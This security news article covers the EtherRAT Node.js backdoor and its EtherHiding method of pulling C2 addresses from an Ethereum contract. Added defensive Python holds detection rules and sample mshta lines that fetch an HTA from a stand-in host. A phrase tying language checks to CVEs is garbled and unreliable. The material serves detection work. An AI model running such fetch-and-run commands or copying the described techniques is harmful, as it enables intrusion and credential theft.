Ethereum-Based EtherRAT and EtherHiding Enable Stealthy Malware Campaigns

Cybersecurity Experts Warn of EtherRAT: A Node.js Backdoor Using Ethereum Blockchain

In a disconcerting development, cybersecurity experts have revealed that hackers are increasingly exploiting the Ethereum blockchain to deploy and manage a sophisticated Node.js backdoor known as EtherRAT. The malware uses a covert technique referred to as EtherHiding to conceal its command-and-control (C2) infrastructure, making it hard for defenders to disrupt its operations.

EtherRAT has been previously flagged by cybersecurity firms, notably Sysdig, and has been associated with the infamous North Korean cyber activity dubbed “Contagious Interview.” This Node.js backdoor allows cybercriminals to execute arbitrary commands on infected systems, collect sensitive information such as credentials and cryptocurrency wallets, and conduct deep host fingerprinting to better understand their targets.

Recent insights from eSentire’s Threat Response Unit (TRU) have highlighted alarming parallels between EtherRAT and the Tsundere Malware-as-a-Service botnet. These similarities include their shared use of operating system fingerprinting commands, language checks based on Common Vulnerabilities and Exposures (CVE), dissemination through IT support scams, and extensive reliance on the free Obfuscator.io JavaScript obfuscator.

In March 2026, TRU made a significant discovery when EtherRAT was detected infiltrating a retail customer’s environment. This incident underscored a multi-faceted approach used by the attackers, encompassing social engineering techniques, the leveraging of Windows living-off-the-land binaries, and blockchain-based C2 resolution.

Understanding EtherRAT

The functionality of EtherRAT is built upon a C2 module dubbed “SYS_INFO,” which conducts meticulous host fingerprinting. This information permits threat actors to tailor their subsequent actions and payload deployments based on the system characteristics.

The initial access vector TRU observes most often is a Microsoft Teams-based IT support scam, typically using Quick Assist for interactive remote access to the victim's system. A second stage, heavily obfuscated with Obfuscator.io, then decrypts the EtherRAT payload from an encrypted configuration file, executes it, and establishes persistence by creating a deliberately named Windows Run key.

The intrusion chain initiated by the attackers commences with a multi-stage Node.js loader. This first stage involves decrypting an encrypted stager using AES-256-CBC and executing the next script from memory. This strategy is advantageous as it largely keeps malicious payloads off the disk during the initial stages, complicating detection efforts.

Adding to the operation's stealth, the persistence commands proxy the execution of node.exe through conhost.exe using undocumented arguments, so the malware's process activity blends in with legitimate Windows processes.

In one particular retail case, the attackers used a ClickFix-style command that abused Indirect Command Execution, chaining processes to retrieve a malicious .hta file from a compromised site while obfuscating the command line to evade detection.

Once executed, the HTA file drops the multi-stage Node.js loader, which ultimately activates EtherRAT and configures the host for blockchain-resolved C2 communications. Rather than hard-coding C2 domains, EtherRAT uses EtherHiding: it retrieves its current C2 address from an Ethereum smart contract, turning the public blockchain into a resilient backbone for its C2 infrastructure that is difficult to take down.
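The process relationships described in the chain above (pcalua.exe launching mshta.exe, mshta.exe fetching a remote HTA, and node.exe proxied through conhost.exe) are what an endpoint detection rule would key on. The following is an added example of such detection logic, not code from the article or from eSentire; the process-creation events and hostnames are constructed for illustration.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # parent process image name
    image: str    # created process image name
    cmdline: str  # full command line

# Constructed process-creation events ("parent|image|cmdline"), modelled on the
# chain described in the article. Not a real capture; hostnames are invalid.
SAMPLE_EVENTS = """\
pcalua.exe|mshta.exe|mshta.exe https://compromised-site.example.invalid/update.hta
cmd.exe|mshta.exe|mshta.exe https://another.example.invalid/a.hta
conhost.exe|node.exe|node.exe C:\\Users\\Public\\loader.js
explorer.exe|conhost.exe|conhost.exe
cmd.exe|node.exe|node.exe server.js
"""

def parse_events(text: str) -> list[ProcEvent]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parent, image, cmdline = line.split("|", 2)
        events.append(ProcEvent(parent.lower(), image.lower(), cmdline))
    return events

def detect(events: list[ProcEvent]) -> list[tuple[str, str]]:
    """Return (rule, cmdline) pairs for events matching the article's chain."""
    hits = []
    for e in events:
        if e.image == "mshta.exe" and e.parent == "pcalua.exe":
            # Indirect Command Execution (pcalua.exe) launching an HTA
            hits.append(("pcalua_to_mshta", e.cmdline))
        elif e.image == "mshta.exe" and re.search(r"https?://", e.cmdline, re.I):
            # HTA pulled straight from a remote site
            hits.append(("mshta_remote_hta", e.cmdline))
        if e.image == "node.exe" and e.parent == "conhost.exe":
            # node.exe proxied through conhost.exe, as in the persistence commands
            hits.append(("conhost_proxied_node", e.cmdline))
    return hits

if __name__ == "__main__":
    for rule, cmd in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{rule}: {cmd}")
```

The benign developer launch of node.exe from cmd.exe in the sample produces no hit, which is the point: the parent process, not node.exe itself, is the signal.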

In TRU's investigation, a single smart contract at 0xe26c57b7fa8de030238b0a71b3d063397ac127d3 was found to be reused across multiple sectors, including retail, business services, software, and finance. The attackers called the contract's setString function to update and rotate their C2 endpoints frequently.
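Because the C2 address lives in contract storage, an analyst who has captured the host's JSON-RPC traffic can recover it by ABI-decoding the string returned by eth_call. The helper below is an added example for that purpose, not code from the article or from eSentire; the contract address is the one quoted above, while the request/response pair and the placeholder function selector are constructed.

```python
import json

# Contract address quoted above from the eSentire TRU findings.
ETHERHIDING_CONTRACT = "0xe26c57b7fa8de030238b0a71b3d063397ac127d3"

def abi_encode_string(s: str) -> str:
    """ABI-encode one dynamic `string` as 0x-hex. Used here only to build a
    realistic sample eth_call result: [offset=32][length][utf-8 bytes, zero-padded]."""
    data = s.encode("utf-8")
    words = (32).to_bytes(32, "big") + len(data).to_bytes(32, "big")
    return "0x" + (words + data + b"\x00" * (-len(data) % 32)).hex()

def abi_decode_string(hexdata: str) -> str:
    """Decode a single ABI-encoded `string` return value from an eth_call result."""
    raw = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    offset = int.from_bytes(raw[0:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("truncated ABI string")
    return raw[start:start + length].decode("utf-8", errors="replace")

def extract_c2_from_rpc(request_json: str, response_json: str):
    """If `request_json` is an eth_call to the known EtherHiding contract, return the
    decoded string from the matching response; otherwise return None."""
    req = json.loads(request_json)
    if req.get("method") != "eth_call":
        return None
    params = req.get("params") or [{}]
    if str(params[0].get("to", "")).lower() != ETHERHIDING_CONTRACT:
        return None
    result = json.loads(response_json).get("result")
    if not isinstance(result, str) or len(result) < 2 + 64 * 2:
        return None          # too short to hold the offset and length words
    return abi_decode_string(result)

# Constructed sample traffic (not a real capture). "0x00000000" stands in for the
# getter's 4-byte function selector, which the article does not name.
SAMPLE_REQUEST = json.dumps({"jsonrpc": "2.0", "id": 1, "method": "eth_call",
    "params": [{"to": ETHERHIDING_CONTRACT, "data": "0x00000000"}, "latest"]})
SAMPLE_RESPONSE = json.dumps({"jsonrpc": "2.0", "id": 1,
    "result": abi_encode_string("https://cdn.example.invalid/api/v2/9f3a1c.png")})
BENIGN_REQUEST = json.dumps({"jsonrpc": "2.0", "id": 2, "method": "eth_blockNumber",
    "params": []})

if __name__ == "__main__":
    print(extract_c2_from_rpc(SAMPLE_REQUEST, SAMPLE_RESPONSE))
```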

Countermeasures and Recommendations

To complicate detection, EtherRAT crafts beacon URLs that closely resemble routine CDN traffic: HTTPS, standard-looking API paths, random hex strings, and benign-looking file extensions such as .png or .css. Randomly generated query parameters further vary each request, making the traffic difficult for traditional detection methods to single out.

EtherRAT can also enable debug logging and supports a reobfuscation routine: it uploads its current source code to the C2 and receives a differently obfuscated version in return, so static detection signatures are continually thwarted.

In response to these threats, cybersecurity analysts advise that organizations should implement stringent defensive measures. These include blocking unnecessary crypto-network RPC providers and deploying Next-Generation Antivirus (NGAV) or Endpoint Detection and Response (EDR) solutions capable of identifying both Node.js malware and living-off-the-land binary abuse. Additionally, enhancing awareness through phishing simulation and security training tailored to counter IT support scams can help organizations bolster their defenses against social engineering efforts.

As a proactive response, TRU has taken steps to isolate affected hosts, contain breaches, and implement updated detection mechanisms across various telemetry layers in their managed detection and response (MDR) frameworks. Organizations are also encouraged to disable mshta.exe and pcalua.exe whenever possible, limit access to system prompts, and invest in user training programs that simulate real-world phishing scenarios, thereby preparing their personnel to recognize and thwart sophisticated cyber threats.
